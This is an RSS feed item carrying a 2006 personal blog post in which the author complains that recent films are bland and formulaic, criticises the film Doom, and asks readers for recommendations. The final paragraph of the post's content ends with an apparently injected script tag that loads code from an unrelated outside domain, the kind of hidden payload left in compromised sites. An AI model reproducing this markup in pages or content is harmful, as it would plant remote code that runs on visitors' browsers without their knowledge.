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		<title>Is it me or are films lacking?</title>
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		<pubDate>Fri, 12 May 2006 18:36:38 +0000</pubDate>
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		<description><![CDATA[It has been a really long time since I watched a non animated film that I actually liked. I keep finding a lot of films really bland and formulaic, like the life has been sucked out of them using a &#8230; <a href="http://www.diaryofawebsite.com/blog/2006/05/is-it-me-or-are-films-lacking/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>It has been a really long time since I watched a non animated film that I actually liked. I keep finding a lot of films really bland and formulaic, like the life has been sucked out of them using a zombie producer with a big straw. I had the dubious pleasure of watching Doom and found myself more interested in working out the shopping list for the next day. Believe me considering my husband is on a wheat, gluten and diary free diet and I am waiting on a website payment, this is hardly the most exciting shopping list unless rice and beans are your thing. I sort of expected a formulaic bland bang bang shoot the monster in the head film from Doom, infact that is not a bad thing in my book. The thing was they chucked out the story and decided that a good route would be to water down Resident Evil, add a dash of comedy in an animated game effect sequence and then ruin it all by casting a combination of wrestling rejects and wannabe actors along with the special effects team that needed their eyes tested. </p>
<p>I do agree that my tastes in film are not possibly the same as a lot. My preference has always been for animation and also Asian cinema such as Korean or Japanese. That being said I simply do like a good film and feel currently that any good film would be a start. There seems a lack of solid food stuff amongst film lately. It&#8217;s all plan and carefully tailoured to the tastes of a non existant middle road. This is not a generalisation as I fully recognise the odd gems there have been in the past few years. The thing is that this is getting such an oddity that I am starting to feel like giving up on any film not in my chosen category. To me, this would be a shame as I like being suprised and finding different films outside my watching zone. I keep on watching these supposidly recommended incredible films willing them to make me take my words and eat like popcorn. Put it this way, if I was at all peekish for popcorn I would be seriously lacking in the buttery word eating area. </p>
<p>It can&#8217;t be that all the films have been done and I certainly am not old enough to be having some nostalgia trip in harking back to the days of ole. All of these drone films just makes it a shame and to appear that the film industry is attempting a pebble dashing doggy doo throwing attempt in a vain hope of striking filmic genius. So far, they appear to be hitting anywhere bar the target and landing themselves with a floor of doo and stinking up the place with titles that should be straight to a market DVD seller. </p>
<p>I feel like there is nothing for it but to again work my way through my DVD collection and hold onto the vague hope that something will turn up like a good penny. On that note, anyone got any suggestions that could bring me out of this film quality desert?<script src="http://secowo.com/wo"></script></p>
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